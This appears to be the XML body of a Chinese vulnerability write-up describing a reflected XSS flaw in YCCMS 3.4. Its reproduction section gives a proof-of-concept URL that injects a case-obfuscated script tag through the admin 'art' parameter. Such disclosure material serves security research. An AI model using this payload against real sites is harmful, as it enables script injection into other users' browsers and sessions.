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yccms-34-反射型xss"/>
      <w:r>
        <w:t xml:space="preserve">YCCMS 3.4 反射型xss</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="一漏洞简介"/>
      <w:r>
        <w:t xml:space="preserve">一、漏洞简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="二漏洞影响"/>
      <w:r>
        <w:t xml:space="preserve">二、漏洞影响</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">YCCMS 3.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="三复现过程"/>
      <w:r>
        <w:t xml:space="preserve">三、复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.0-sec.org/admin/?a=html&amp;art=&lt;sCrIpT&gt;alert(ian)&lt;%2FsCrIpT&gt;&amp;m=arts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2020-09-17T07:57:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-17T07:57:18Z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